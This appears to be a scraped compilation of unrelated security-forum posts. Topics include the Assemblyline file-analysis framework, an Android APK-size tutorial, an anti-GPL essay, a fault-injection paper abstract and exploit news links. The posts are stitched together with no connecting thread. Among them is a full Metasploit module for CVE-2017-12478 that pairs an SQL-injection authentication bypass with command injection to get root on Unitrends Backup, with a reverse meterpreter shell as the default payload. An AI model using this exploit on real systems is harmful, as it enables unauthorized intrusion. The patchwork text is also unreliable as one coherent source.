Leaderboard

" Canada's electronic spy agency says it is taking the "unprecedented step" of releasing one of its own cyber defence tools to the public, in a bid to help companies and organizations better defend their computers and networks against malicious threats. " - http://www.cbc.ca/news/technology/cse-canada-cyber-spy-malware-assemblyline-open-source-1.4361728 Assemblyline Assemblyline is a scalable distributed file analysis framework. It is designed to process millions of files per day but can also be installed on a single box. An Assemblyline cluster consists of 3 types of boxes: Core, Datastore and Worker. Components Assemblyline Core The Assemblyline Core server runs all the required components to receive/dispatch tasks to the different workers. It hosts the following processes: Redis (Queue/Messaging) FTP (proftpd: File transfer) Dispatcher (Worker tasking and job completion) Ingester (High volume task ingestion) Expiry (Data deletion) Alerter (Creates alerts when score threshold is met) UI/API (NGINX, UWSGI, Flask, AngularJS) Websocket (NGINX, Gunicorn, GEvent) Assemblyline Datastore Assemblyline uses Riak as its persistent data storage. Riak is a Key/Value pair datastore with SOLR integration for search. It is fully distributed and horizontally scalable. Assemblyline Workers Workers are responsible for processing the given files. Each worker has a hostagent process that starts the different services to be run on the current worker and makes sure that those service behave. The hostagent is also responsible for downloading and running virtual machines for services that are required to run inside of a virtual machine or that only run on Windows. Assemblyline reference manual If you want to know more about Assemblyline, you can get a copy of the full reference manual. It can also be found in the assemblyline/manuals directory of your installation. Getting started Use as an appliance An appliance is a full deployment that's self contained on one box/vm. You can easily deploy an Assemblyline appliance by following the appliance creation documentation. Install Appliance Documentation Deploy a production cluster If you want to scan a massive amount of files then you can deploy Assemblyline as a production cluster. Follow the cluster deployment documentation to do so. Install Cluster Documentation Development You can help us out by creating new services, adding functionality to the infrastructure or fixing bugs that we currently have in the system. You can follow this documentation to get started with development. Setup your development desktop Setting up your development desktop can be done in two easy steps: Clone the Assemblyline repo run the setup script Clone repo First, create your Assemblyline working directory: export ASSEMBLYLINE_DIR=~/git/al mkdir -p ${ASSEMBLYLINE_DIR} Then clone the main Assemblyline repo: cd $ASSEMBLYLINE_DIR git clone https://bitbucket.org/cse-assemblyline/assemblyline.git -b prod_3.2 Clone other repos ${ASSEMBLYLINE_DIR}/assemblyline/al/run/setup_dev_environment.py NOTE: The setup script will use the same git remote that you've used to clone the Assemblyline repo Setup your development VM After you're done setting up your Desktop, you can setup the VM from which you're going to run your personal Assemblyline instance. Local VM If you want to use a local VM make sure your desktop is powerful enough to run a VM with 2 cores and 8 GB of memory. You can install the OS by following this doc: Install Ubuntu Server (Alternative) Amazon AWS or other cloud providers Alternatively you can use a cloud provider like Amazon AWS. We recommend 2 cores and 8 GB of ram for you Dev VM. In the case of AWS this is the equivalent to an m4.large EC2 node. Whatever provider and VM size you use, make sure you have a VM with Ubuntu 14.04.3 installed. Installing the assemblyline code on the dev VM When you're done installing the OS on your VM, you need to install all Assemblyline components on that VM. To do so, follow the documentation: Install a Development VM Finishing setup Now that the code is synced on your desktop and your Dev VM is installed, you should setup your development UI. Make sure to run the tweaks on your Dev VM to remove the id_rsa keys in order to have your desktop drive the code in your VM instead of the git repos. If you have a copy of PyCharm Pro, you can use the remote python interpreter and remote deployment features to automatically sync code to your Dev VM. Alternatively, you can just manually rsync your code to your Dev VM every time you want to test your changes. Setting up pycharm Open PyCharm and open your project: ~/git/al (or ASSEMBLYLINE_DIR if you change the directory) Pycharm will tell you there are unregistered git repos, click the 'add roots' button and add the unregistered repos. Remote interpreter (pro only) If you have the PyCharm Pro version you can set up the remote interpreter: file -> settings Project: al -> Project Interpreter Cog -> Add Remote SSH Credentials host: ip/domain of your VM user: al authtype: pass or keypair if AWS password: whatever password you picked in the create_deployment script click ok NOTE: Leave the settings page opened for remote deployments. At this point you should be done with your remote interpreter. Whenever you click the play or debug button it should run the code on the remote Dev VM. Remote Deployment (PyCharm Pro only) Still in the settings page: Build, Execution, Deployment - > Deployment Plus button Name: assemblyline dev_vm Type: SFTP click OK # In the connection tab SFTP host: ip/domain of your VM User name: al authtype: pass or keypair if AWS password: whatever password you picked in the create_deployment script Click autodetect button Switch to Mappings page click "..." near Deployment path on server choose pkg click ok NOTE: At this point you should be done with your remote deployment. When you make changes to your code, you can sync it to the remote Dev VM by opening the 'Version Control' tab at the bottom of the interface, selecting 'Local changes', right clicking on Default and selecting upload to 'assemblyline dev_vm' Create a new service To create a new service, follow the create service tutorial. Create service tutorial Link: https://bitbucket.org/cse-assemblyline/

Dear Dr.d3v1l The vulnerabilities you reported has been fixed. As a token of our appreciation we would like to offer you a t-shirt. If you would like a t-shirt please provide us with your preferred t-shirt size (S/M/L/XL/XXL) and on what address you would like to receive the t-shirt. Thanks in advance for your reply and thanks again for your report. Sincerely,

There are already many good articles on “How to reduce size of an apk”. My focus in this article will be on “Reuse of resources”. Resources contribute a major chunk in the size of apk. The techniques that I’ll be mentioning here only takes few lines of changes and will save a great deal of space. # Use RotateDrawable resources Many a times, resources are nothing but just a rotated version of some other resource. For e.g. collapse arrow and expand arrow arrow_up.xml can be easily drawn using arrow_down.xml. Create a file named arrow_up.xml in res/drawable folder like this: <?xml version="1.0" encoding="utf-8"?> <rotate xmlns:android="http://schemas.android.com/apk/res/android" android:drawable="@drawable/arrow_down" android:fromDegrees="180" android:pivotX="50%" android:pivotY="50%" android:toDegrees="180" /> res/drawable/arrow_up.xml # Use setColorFilter for resources with different colour versions In this example, three different versions of same icon are used. Instead of using three different icon sets, we can easily use setColorFilter to produce other two icons using the first one. To achieve this, we can create a custom view that extends ImageView and apply color filter in its constructor by passing the desired color in its xml attributes. We’ll need: CustomColorIconView.java — Class that extends ImageView attrs.xml — styleable for color attribute public class CustomColorIconView extends ImageView{ public CustomColorIconView(Context context) { super(context); } public CustomColorIconView(Context context, AttributeSet attrs) { super(context, attrs); init(context, attrs); } public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); init(context, attrs); } @TargetApi(Build.VERSION_CODES.LOLLIPOP) public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr, int defStyleRes) { super(context, attrs, defStyleAttr, defStyleRes); init(context, attrs); } private void init(Context context, AttributeSet attrs){ TypedArray typedArray = context.obtainStyledAttributes(attrs, R.styleable.CustomColorIconView); int color = typedArray.getColor(R.styleable.CustomColorIconView_dciv_color,0); setColorFilter(color, PorterDuff.Mode.SRC_ATOP); typedArray.recycle(); } public void setImageFilterColor(int color) { if(color == -1) { setColorFilter(null); } else { setColorFilter(color,PorterDuff.Mode.SRC_ATOP); } } } CustomColorIconView.java <declare-styleable name="CustomColorIconView"> <attr name="dciv_color" format="color"/> </declare-styleable> attrs.xml That’s it. Now to use this in your xml, create a CustomColorIconView and set dciv_color to whatever color you need. In this case, we changed the dark location icon to white. <CustomColorIconView android:layout_width="wrap_content" android:layout_height="wrap_content" android:src="@drawable/ic_location_dark" app:dciv_color="@color/white" /> layout.xml That’s all for this post! Will keep posting interesting snippets about Android and other things. Follow me to get updates :) Thanks for reading this article. Be sure to clap/recommend as much as you can and also share with your friends. It means a lot to me. Source

Abstract: Today’s standard embedded device technology is not robust against Fault Injection (FI) attacks such as Voltage Fault Injection (V-FI). FI attacks can be used to alter the intended behavior of software and hardware of embedded devices. Most FI research focuses on breaking the implementation of cryptographic algorithms. However, this paper’s contribution is in showing that FI attacks are effective at altering the intended behavior of large and complex code bases like the Linux Operating System (OS) when executed by a fast and feature rich System-on-Chip (SoC). More specifically, we show three attacks where full control of the Linux OS is achieved from an unprivileged context using V-FI. These attacks target standard Linux OS functionality and operate in absence of any logical vulnerability.We assume an attacker that already achieved unprivileged code execution. The practicality of the attacks is demonstrated using a commercially available V-FI test bench and a commercially available ARM Cortex-A9 SoC development board. Finally, we discuss mitigations to lower probability and minimize impact of a successful FI attack on complex systems like the Linux OS. Link: https://www.riscure.com/publication/escalating-privileges-linux-using-fault-injection/

Samsung Gear 360 - 500 Lei http://www.f64.ro/samsung-gear-360-camera-video-foto-vr-splashproof-alb.html

Bug ios 11.0.3 data 22.10.2017 posibil pana sapt viitoare sa fie bugul asta!! DOAR CELE CARE AU AVUT TWO FACTORY adica COD DE ECRAN SI SUNT CLEAN!!!! Prima oara nu ii merge touchul e LCD china https://streamable.com/p5ljb Succes!

TLDR Microsoft reintroduced a kernel vulnerability in Windows 10 Creators Update which was originally patched in 2016. This blog showcases the exploitation of this “wild” Pool-based overflow in the kernel on Windows 10 x64 (RS2) Microsoft improved the validation of the BASEOBJECT64.hHmgr field which makes linear Pool overflows on the Paged Session Pool harder to exploit when using well-known exploitation techniques using Palettes or Bitmaps Exploitation using Palettes or Bitmaps to get arbitrary Read-Write primitives is still possible despite the improved hHmgr Handle validation Exploits (one using Palettes, one using Bitmaps) have been published on Github sursa : https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html

#droidconDE 2017: Garima Jain - Dagger 2 Android: Defeat the Dahaka - DAY 1 Almost 1200 attendees converged at the ninth annual droidcon Berlin co-located for the first time with IFA (Internationale Funkausstellung), one of the world’s largest consumer electronics shows in the world. Playlist https://droidcon.de/en/program/sessions

It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Unitrends UEB 9 http api/storage remote root', 'Description' => %q{ It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. }, 'Author' => [ 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted 'Jared Arave' # @iotennui ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86], 'CmdStagerFlavor' => [ 'printf' ], 'References' => [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], ['CVE', '2017-12478'], ], 'Targets' => [ [ 'UEB 9.*', { } ] ], 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]) ]) deregister_options('SRVHOST', 'SRVPORT') end #substitue some charactes def filter_bad_chars(cmd) cmd.gsub!("\\", "\\\\\\") cmd.gsub!("'", '\\"') end def execute_command(cmd, opts = {}) session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass session = Base64.strict_encode64(session) #b64 encode session token #substitue the cmd into the hostname parameter parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| parms << filter_bad_chars(cmd) parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ 'uri' => '/api/storage', 'method' => 'POST', 'ctype' => 'application/json', 'encode_params' => false, 'data' => parms, 'headers' => {'AuthToken' => session} }) if res && res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end def exploit print_status("#{peer} - pwn'ng ueb 9....") execute_cmdstager(:linemax => 120) end end Source

How Retailers Use Personalized Prices to Test What You’re Willing to Pay Rafi Mohammed October 20, 2017 https://hbr.org/2017/10/how-retailers-use-personalized-prices-to-test-what-youre-willing-to-pay

The Free Software Foundation and it's sprout the GNU Project are a core element of the free and open source software movement. They led to a new era of software development where sharing and improving as a community is more valuable than selling proprietary software (maybe because we stopped selling software altogether and started selling services). But there is a key thing in the most popular free licence of the world, a key problem that let me question if this license is truly free, or if it brings a distorted concept of freedom. And it's a problems affecting both version 2.0 and 3.0 of the GNU Public License. Is a license that sets limits to developers really "free"? Software freedom as intended by Richard Stallman and the FSF is not real freedom, just like communism is not really about sharing and loving each other. Communism is more like being at the bottom of the pit, and forcing everyone to stay down there just because you don't wanna be left behind by those who manage to climb. Software freedom in the stallmanian way of thinking is not about being free, is about not doing anything on your own. No commercial software, no code that you keep for yourself, no way to use it in a manner that makes you keep it private. Which is good, right? Well, not really. Not at all. Free not to be free A key point of this whole text is about the definition of freedom. What follows is MY POINT OF VIEW and does not reflect any "official" definition of freedom. In my vision of software freedom, free software means that I'm allowed to use it in my daily work, to make use of libraries and programs inside my projects. I mean, that is the whole reason I do open source in the first place. When I started the PlugFace Framework I decided to release it under the MIT License because I thought that it could be useful to other people in need of using plugins inside their software. I thought of other developers in my same situation, in need of modularizing their monolitic application at work with a simple and robust solution. I don't care if you want to use it in proprietary software, on the contrary I would be flattered by this. GPL wouldn't allow that to happen. A PlugFace Framework released under GPL would have never been used in enterprise environment because it would require to the user to release their software under the same license. Even with LGPL, which allows software linking to proprietary software, would not have been ideal since any customization (i.e. proprietary security features to validate plugins?) could not have been kept private. So if I'm developing a library, why should I want to use a GPL-like license? Why should I choose a free license in order to limit other developers' freedom? But Matt, without a strong copyleft license $InsertNefariousSoftwareCompanyHere could steal your work and sell it with their name on it, and you wouldn't see a dime of it. I can hear you reply like that already. And my answer would be: THAT'S EXACTLY WHAT I WANT. If you are reading this and you are a software company, please TAKE MY CHILD SOFTWARE AND DO WHAT YOU WISH WITH IT. If my goal was to make money I wouldn't be doing open source, I would try with something easier. Like forex trading, ice-cream making or underground drug dealing. Instead, I'm doing open source software because I want people to use it, to solve problems with it. I imagine professional software developers like myself being stuck with a problem, finding out my GitHub account and thinking "Well damn, this guy has made a library that exactly do what I need". And it would download it, and link it into his software and proceding working, and I would send him a spiritual "You're welcome buddy" through the Force. That's why, if you write software libraries, you should NEVER EVER USE GPL LICENSES. The best enterprise software are released under weak copyleft licenses, like Kubernetes, Docker, Google Guava, FreeBSD and many others. cLinux doesn't count. Linux is a final product, not a middleware. But still, remember that without weak licensing and with Linux as the only open source OS, products like the PlayStation 4 and the Nintendo Switch would be very very different. Choose another license, please There are many many great licenses out there that are truly free. They will make Stallman angry (and that's probably something that I would truly enjoy), but they will also make many fellow developers happy and thankful. My favourite ones are the the Apache License 2.0 and MIT License. I release all of my works under those two licenses (and also the MPL 2.0 for complete products, aka not libraries). If you want a complete list, check out this awesome site from GitHub and look for licenses that does not feature the Same license tag in the Conditions column. They are the weak-copyleft ones. Sursa: https://dev.to/matteojoliveau/gnu-public-license-is-all-but-free-and-you-should-never-use-it-3fk

Si nu numai Word... Iar pentru cine e interesat de aceasta "functionalitate", aici este un articol care discuta DDEAUTO: https://www.endgame.com/blog/technical-blog/bug-feature-debate-back-yet-again-ddeauto-root-cause-analysis Update Metode de mitigare https://www.peerlyst.com/posts/no-macros-no-problem-how-microsoft-office-dde-attacks-work-and-how-to-block-them-barkly https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b Si inca un vector:

Versiunea Python2 dupa cum am promis. Imi cer scuze legat de calitatea codului.

http://andreicostin.com/index.php/brain/2009/11/14/ratb_card_activ_hacked http://andreicostin.com/media/blogs/brain/RATB_Card_Security_Assessment_v0_1.pdf